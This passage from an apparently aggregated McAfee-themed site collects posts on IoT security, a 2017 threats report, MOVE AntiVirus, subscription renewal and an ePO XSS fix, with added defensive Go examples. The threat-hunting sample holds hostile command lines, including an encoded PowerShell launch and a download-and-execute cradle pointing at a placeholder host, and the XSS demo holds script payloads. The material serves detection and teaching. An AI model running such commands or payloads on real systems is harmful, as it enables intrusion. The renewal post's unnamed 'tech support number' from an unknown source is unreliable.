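The signed-update and anti-rollback rules from item 2 above, as an added example that is not part of the original post or of any McAfee product: a device pins the vendor’s ed25519 public key at manufacture time and accepts an update only if the manifest is signed by that key, the version is strictly newer than what is installed, and the image hashes to the signed value. The manifest layout, the version-plus-hash signing scheme, the Device type and the sample image bytes are all assumptions for this example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// UpdateManifest is a hypothetical update description (layout assumed for this
// example). It binds the image hash to a monotonically increasing version so a
// signed-but-old image cannot be replayed onto the device as a rollback.
type UpdateManifest struct {
	Version   uint32
	ImageHash [32]byte
	Signature []byte // ed25519 signature over signedBytes()
}

// signedBytes is the canonical byte string the vendor signs: version then hash.
func (m *UpdateManifest) signedBytes() []byte {
	buf := make([]byte, 4+32)
	binary.BigEndian.PutUint32(buf[:4], m.Version)
	copy(buf[4:], m.ImageHash[:])
	return buf
}

// Device holds what a provisioned device needs for this check: the vendor key
// pinned at manufacture time and the version currently installed.
type Device struct {
	VendorKey      ed25519.PublicKey
	CurrentVersion uint32
}

var (
	ErrBadSignature  = errors.New("manifest signature invalid")
	ErrRollback      = errors.New("update version not newer than installed")
	ErrImageMismatch = errors.New("image does not match signed hash")
)

// VerifyUpdate accepts an update only if the manifest is signed by the pinned
// key, the version is strictly newer, and the image hashes to the signed value.
// The signature is checked first so unsigned data never drives any other
// decision; only a fully verified update advances CurrentVersion.
func (d *Device) VerifyUpdate(m UpdateManifest, image []byte) error {
	if !ed25519.Verify(d.VendorKey, m.signedBytes(), m.Signature) {
		return ErrBadSignature
	}
	if m.Version <= d.CurrentVersion {
		return ErrRollback
	}
	if sha256.Sum256(image) != m.ImageHash {
		return ErrImageMismatch
	}
	d.CurrentVersion = m.Version
	return nil
}

// GenerateVendorKey stands in for the vendor's offline signing-key ceremony.
func GenerateVendorKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// SignUpdate is the vendor side: run on the build server, never on the device.
func SignUpdate(priv ed25519.PrivateKey, version uint32, image []byte) UpdateManifest {
	m := UpdateManifest{Version: version, ImageHash: sha256.Sum256(image)}
	m.Signature = ed25519.Sign(priv, m.signedBytes())
	return m
}

func main() {
	pub, priv := GenerateVendorKey()
	dev := &Device{VendorKey: pub, CurrentVersion: 3}
	fw4 := []byte("constructed firmware image v4")

	m4 := SignUpdate(priv, 4, fw4)
	fmt.Println("genuine v4:     ", dev.VerifyUpdate(m4, fw4)) // <nil>, device now at 4
	fmt.Println("replayed v4:    ", dev.VerifyUpdate(m4, fw4)) // rollback

	tampered := append([]byte(nil), fw4...)
	tampered[0] ^= 0x01
	m5 := SignUpdate(priv, 5, fw4)
	fmt.Println("tampered image: ", dev.VerifyUpdate(m5, tampered)) // image mismatch

	m5.Version = 6 // attacker bumps the version without the signing key
	fmt.Println("forged version: ", dev.VerifyUpdate(m5, fw4)) // signature invalid
}
```

The version counter is what turns "updates must be signed" into a rule an attacker cannot satisfy with an old, genuinely signed image that has a known bug; on real hardware that counter belongs in monotonic or write-once storage, not a file an attacker with local access can rewrite.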

Enterprise and industrial devices are typically managed centrally, by the purchasing organization. This management may overlap with, or be entirely separate from, provisioning by the manufacturer or service provider. Entire classes of devices, potentially numbering in the thousands, may be controlled individually or as part of a collective. The same choices and controls are required. Instead of a single owner, an organization’s employees will administer the IoT devices, monitor for issues, and respond to problems.

Proper administration and management is about oversight and final control by the device owner. It should be simple to understand and easy to manage. Devices should possess the necessary processes to determine if something is wrong, communicate such events to their owners, and provide options to resolve issues. IoT devices are here to make our world better and smarter; they themselves must bring some intellect to the ecosystem to protect themselves and work with their owners for their benefit.

How do we make IoT security a reality? 

Security and privacy take effort, resources, and commitment. To change from the status quo, we must hold manufacturers accountable for their devices. If they fail to design and architect security into their products, make them liable and stop buying their wares. For critical functions that could put the safety of people at risk, enact regulations and subject them to government penalties.

As part of the best practices that manufacturers and service providers must follow, developers must build in the controls that make provisioning and initial configuration secure by default. Industry consortiums are working to define best practices, configurations, and default settings for different device classes.

Last, and perhaps most difficult, is to raise the level of awareness and involvement of users. It is their own security, and the availability of the Internet services that compromised devices can be turned against, that are at risk. Without some assistance from consumers and businesses, these controls will be easily undermined or neglected. That requires ongoing engagement. We all have a responsibility, as a digital community, to maintain reasonable hygiene for devices connecting to our common resource, the Internet.

The choice is ours

It may seem like a lot to consider, but remember that attackers need only find a single usable vulnerability to exploit. The opportunity is to make the effort challenging enough that they are not motivated to pursue these devices. We find ourselves in a situation in which billions of IoT products will flood every industry and quickly find their way into our homes, schools, governments, and businesses. We must make the necessary efforts to ensure they do not bring vulnerabilities with them. The effects will go well beyond our own lives, data, and devices. They may be turned into legions of bots, which could cause havoc to even the biggest of organizations on the Internet. We could all become victims if we do not work together to make our future technology trustworthy, safe, and secure.

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

McAfee Labs Threats Report Explores WannaCry/Petya, Threat Hunting, Script-Based Malware


We published the McAfee Labs Threats Report: September 2017. This quarter’s report shows off a new design. We hope you will find it attractive as well as informative. The report contains three highly educational topics, in addition to the usual set of threats statistics:

  • Earlier this year, WannaCry malware infected more than 300,000 computers in over 150 countries in less than 24 hours. Several weeks later, the malware Petya exploited the same Windows SMB flaw, along with multiple other techniques, to spread to other computers on the same network. Among other lessons, these attacks exposed the continued use of old and unsupported operating systems in critical areas, and they laid bare the lax patch-update processes followed by some businesses. We explore the timeline and background of the WannaCry attack and of Petya, its apparent follow-up; the vulnerabilities they exploited; a technical analysis of their infiltration and propagation methods; and our thoughts on the motives for these attacks and what they might lead to.
  • Threat hunting is a growing and evolving capability in cybersecurity, one with a broad definition and wide range of goals, but it is generally seen as a proactive approach to finding attacks and compromised machines without waiting for alerts. Threat hunting enables security operations to study the behaviors of attackers and build more visibility into attack chains. This results in a more proactive stance for the security operations center, shifting the focus to earlier detection, faster reaction times, and enhanced risk mitigation. In May, McAfee surveyed more than 700 IT and security professionals around the world to better understand how threat hunting is used in organizations today and how they plan to enhance their threat hunting capabilities in the future. We offer detailed advice and recommendations for using certain types of indicators of compromise when hunting for threats.
  • Cyberattackers often use scripting techniques in their assaults. Some attacks employ script-based malware at every stage, while others use it for a specific purpose. Script-based malware—written in the JavaScript, VBS, PHP, or PowerShell scripting languages—has been on the upswing during the last two years for a very simple reason: evasion. Scripts are easy to obfuscate and thus are difficult for security technology to detect. In this Key Topic, we discuss why cybercriminals leverage script-based malware, how script-based malware propagates, the types of malware that use scripts for distribution, ways in which authors obfuscate script-based malware, and how to protect against script-based malware.
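The threat hunting and script-based malware topics above, as one added example that is not from the McAfee report: a small hunt over constructed process-creation records that scores script-host launches (powershell.exe, wscript.exe, cscript.exe, mshta.exe) for the evasion tricks the report describes, such as encoded commands, hidden windows, download cradles and character-code string building, and weights an Office parent process heavily because that is how most script-based malware arrives. The log format, the indicator list, the weights and every sample line (including the base64 blob and the example.invalid URL) are constructed for this example; they are not vendor rules or real telemetry.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ProcEvent is a minimal process-creation record of the kind a hunt pulls from
// Sysmon event 1 or an EDR. The field set is an assumption for this example.
type ProcEvent struct {
	Host, Parent, Image, CmdLine string
}

// SampleEvents are constructed records: host|parent image|child image|command line.
const SampleEvents = `
ws01|explorer.exe|powershell.exe|powershell.exe Get-ChildItem C:\Users
ws02|winword.exe|powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA
ws03|cmd.exe|wscript.exe|wscript.exe //B C:\Users\Public\inv.js
ws04|outlook.exe|mshta.exe|mshta.exe javascript:eval(String.fromCharCode(118,97,114))
ws05|services.exe|svchost.exe|svchost.exe -k netsvcs
ws06|cmd.exe|powershell.exe|powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
`

// ParseEvents splits the pipe-separated lines; a command line may itself
// contain '|', so only the first three separators are significant.
func ParseEvents(raw string) []ProcEvent {
	var out []ProcEvent
	for _, line := range strings.Split(strings.TrimSpace(raw), "\n") {
		f := strings.SplitN(strings.TrimSpace(line), "|", 4)
		if len(f) != 4 {
			continue
		}
		out = append(out, ProcEvent{Host: f[0], Parent: f[1], Image: f[2], CmdLine: f[3]})
	}
	return out
}

var scriptHosts = map[string]bool{
	"powershell.exe": true, "wscript.exe": true, "cscript.exe": true, "mshta.exe": true,
}
var officeParents = map[string]bool{"winword.exe": true, "excel.exe": true, "outlook.exe": true}

// indicator is a weighted heuristic. Weights are my choice for this example,
// not a vendor rule; tune them against your own baseline.
type indicator struct {
	name   string
	re     *regexp.Regexp
	weight int
}

var indicators = []indicator{
	{"encoded-command", regexp.MustCompile(`(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}`), 3},
	{"hidden-or-noprofile", regexp.MustCompile(`(?i)-(nop\b|noprofile|w\s+hidden|windowstyle\s+hidden)`), 1},
	{"download-cradle", regexp.MustCompile(`(?i)(downloadstring|downloadfile|invoke-webrequest|\bwget\b|\bcurl\b)`), 2},
	{"invoke-expression", regexp.MustCompile(`(?i)\b(iex|invoke-expression)\b`), 2},
	{"char-code-build", regexp.MustCompile(`(?i)(\[char\]\d+|fromcharcode)`), 2},
}

// Finding is one scored script-host launch with the reasons it scored.
type Finding struct {
	Event   ProcEvent
	Score   int
	Reasons []string
}

// Hunt scores every script-host launch and returns those at or above threshold.
// Lower-scoring launches are not noise to discard; they are the queue an
// analyst works through, which is what makes this hunting rather than alerting.
func Hunt(events []ProcEvent, threshold int) []Finding {
	var out []Finding
	for _, ev := range events {
		if !scriptHosts[strings.ToLower(ev.Image)] {
			continue
		}
		f := Finding{Event: ev}
		if officeParents[strings.ToLower(ev.Parent)] {
			f.Score += 3
			f.Reasons = append(f.Reasons, "office-parent")
		}
		for _, ind := range indicators {
			if ind.re.MatchString(ev.CmdLine) {
				f.Score += ind.weight
				f.Reasons = append(f.Reasons, ind.name)
			}
		}
		if f.Score >= threshold {
			out = append(out, f)
		}
	}
	return out
}

func main() {
	for _, f := range Hunt(ParseEvents(SampleEvents), 4) {
		fmt.Printf("%s score=%d %v\n  %s\n", f.Event.Host, f.Score, f.Reasons, f.Event.CmdLine)
	}
}
```

With a threshold of 4 the sample flags ws02, ws04 and ws06; ws03 (a plain wscript.exe launch of a script from a user-writable directory) scores 0 and is exactly the kind of event a hunter reviews by hand, since the obfuscation here lives inside the .js file rather than on the command line.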

Accompanying the first and last Key Topics are Solution Briefs that go into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q2:

  • Malware: New malware samples leaped in Q2 to 52 million, a 67% increase. The total number of malware samples grew 23% in the past four quarters to almost 723 million samples.
  • Ransomware: New ransomware samples again increased sharply in Q2, by 54%. The number of total ransomware samples grew 47% in the past four quarters to 10.7 million samples.
  • Mobile malware: Global infections of mobile devices rose by 8%, led by Asia with 18%. Total mobile malware grew 61% in the past four quarters to 18.4 million samples.
  • Incidents: We counted 311 publicly disclosed security incidents in Q2, an increase of 3% over Q1. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q2 took place in the Americas.

Source : securingtomorrow.mcafee.com


McAfee MOVE AntiVirus Multiplatform Deployment Just Got a Lot Easier


McAfee Management for Optimized Virtual Environments AntiVirus (McAfee MOVE AntiVirus) optimizes security for virtual desktops and servers. Version 4.6 became available on July 18, 2017. One of the major enhancements offered by this release is dramatic simplification of the multiplatform deployment process. McAfee MOVE AntiVirus 4.6 automates the deployment of the Security Virtual Machine (SVM) Manager, SVM and clients, reducing manual clicks by 70%!

Here’s a quick walk through of the new streamlined deployment steps:

Step 1:  Installing the software extensions and product packages is now a single click, so that you can install McAfee MOVE AntiVirus components on McAfee ePolicy Orchestrator (McAfee ePO) or deploy them to virtual systems. No more separate downloads.

Step 2:  As in previous versions of McAfee MOVE AntiVirus, you register your VMware vCenter account with McAfee ePO.

Step 3:  Configuration and deployment of the SVM Manager is now consolidated into one step using a single Meta Package.

Step 4:  You review your McAfee MOVE AntiVirus deployment status.

Step 5:  Next, you deploy the McAfee MOVE AntiVirus client. The McAfee MOVE AntiVirus client will automatically run the European Institute for Computer Antivirus Research (EICAR) test.  This means that you no longer need to log into the MOVE client and the MOVE SVM to check connection status and that you don’t need to run separate EICAR tests.

Step 6:  The SVM deployment will start automatically. Deployment of SVM load balancing is also automatic.

Error codes for all six steps are now automatically generated and displayed in the status during installation to make diagnosing issues much easier.

Learn More

McAfee MOVE AntiVirus 4.6 includes a number of additional enhancements, including the ability to block more threats in multiplatform deployments with improved threat intelligence. Check out the release notes for more details.

Source : securingtomorrow.mcafee.com


How To Renew Mcafee Antivirus Application – Step Wise Guide


McAfee antivirus is a widely used antimalware program that you can use to protect your data. It protects against viruses, malware, ransomware, spyware, rootkits, Trojans, and many similar threats. McAfee antivirus also bundles features such as a firewall, encryption software, parental controls, spam management, a password manager, anti-spam, and more. One of the best aspects of the software is that a single subscription can be installed on several of the devices you own, so all of them are protected from the threats you may encounter.

McAfee Antivirus Renewal Support

In order to use McAfee antivirus, you need a subscription. McAfee antivirus is normally set to renew the subscription automatically, but sometimes auto-renewal is switched off or fails. In that case it becomes essential to renew McAfee antivirus manually so that your system remains protected at all times and does not fall victim to current security threats.

New virus attacks appear every day and vary in structure and method, so the antivirus must be kept up to date to deal with them. McAfee updates carry the detection definitions for the latest threats, and those updates stop once the subscription has expired.

To renew, follow the steps below, or get in touch with the McAfee Antivirus Technical Support Number.

Steps to Renew McAfee Antivirus:

If your McAfee antivirus subscription has expired or is about to expire, follow the steps below to renew it.

  • Open the McAfee website in your browser and sign in to your McAfee account.
  • Click “My account”, then click Subscriptions.
  • Here you can see all of your subscriptions, both expired and active.
  • Find the subscription that has expired or is about to expire.
  • Click the Renew button next to it.
  • Then follow the on-screen steps to complete the renewal.


If you run into a problem at any point, do not hesitate to call the McAfee antivirus tech support phone number to get it resolved. For any other issue with your McAfee software, McAfee professionals are available 24/7 through Pro Tech Knowledge.

Source : Unknown


Patches Resolve ePO 5.1.3 Vulnerability


A vulnerability in ePO 5.1.3 has been discovered and resolved.

AFFECTED SOFTWARE: 5.1.3.188

REMEDIATED/PATCHED VERSIONS

The vulnerability is remediated in these versions:
• ePolicy Orchestrator 5.1.3 Hotfix 1110787.
• Fix will be included in 5.1.4 (when available).
• The issue never affected ePO 5.3.0 or higher.

IMPACT
• CVE-2017-3902 (CVSS: 4.0; Severity: Medium)
A cross-site scripting (XSS) vulnerability in the Web user interface (UI) in ePO 5.1.3, 5.1.2, 5.1.1, and 5.1.0 allows authenticated users to inject malicious JavaScript by bypassing input validation.
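The general fix for the class of bug described above, as an added example that is not ePO code: an XSS in which authenticated users inject script through a stored field is defused not by input validation alone (the bulletin says that was bypassed) but by encoding every value for the context it is rendered in. The page template, the field names and the hypothetical handler are assumptions for this example. It renders the same template once with Go’s text/template, which interpolates verbatim, and once with html/template, which escapes per context and refuses a javascript: URL in an href.

```go
package main

import (
	"fmt"
	htmltpl "html/template"
	"strings"
	texttpl "text/template"
)

// Page is the data a UI handler hands to its template. DisplayName and Link
// are attacker-controlled: in a stored XSS one authenticated user saves them
// and another user (often an administrator) renders them later.
type Page struct {
	DisplayName string
	Link        string
}

// layout is an assumed page fragment. The values land in two different
// contexts, element text and a URL attribute, which need different encoding.
const layout = `<h1>Welcome {{.DisplayName}}</h1><a href="{{.Link}}">profile</a>`

var (
	unsafeTpl = texttpl.Must(texttpl.New("unsafe").Parse(layout))
	safeTpl   = htmltpl.Must(htmltpl.New("safe").Parse(layout))
)

// RenderUnsafe interpolates values verbatim. This is the vulnerable pattern:
// whatever input validation ran upstream, any value that slipped through
// becomes live markup in the viewer's browser.
func RenderUnsafe(p Page) string {
	var b strings.Builder
	if err := unsafeTpl.Execute(&b, p); err != nil {
		panic(err)
	}
	return b.String()
}

// RenderSafe uses html/template, which escapes each value according to the
// context it is inserted into and replaces unsafe URL schemes with #ZgotmplZ.
func RenderSafe(p Page) string {
	var b strings.Builder
	if err := safeTpl.Execute(&b, p); err != nil {
		panic(err)
	}
	return b.String()
}

func main() {
	p := Page{DisplayName: `<script>alert(1)</script>`, Link: `javascript:alert(2)`}
	fmt.Println("text/template:", RenderUnsafe(p))
	fmt.Println("html/template:", RenderSafe(p))
}
```

The point a reviewer should take from this is that the escaping decision is made at output time, per context, by the templating layer, so it cannot be bypassed by a value that an input filter failed to catch; a benign name such as O'Neil & Sons still renders correctly, only as entity-encoded text.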

RECOMMENDATION
Intel Security recommends that all customers verify that they have applied the latest updates. Impacted users should install the relevant patches or hotfixes. For full instructions and information, see Knowledge Base article SB10184 – Intel Security – Security Bulletin: ePolicy Orchestrator update fixes cross-site scripting vulnerability (CVE-2017-3902) (https://kc.mcafee.com/corporate/index?page=content&id=SB10184)

For more information on the hotfix see the ePO 5.1.3 Hotfix 1110787 Release Notes:
PD26861 – https://kc.mcafee.com/corporate/index?page=content&id=PD26861

Source : mcafee-antivirus-setup
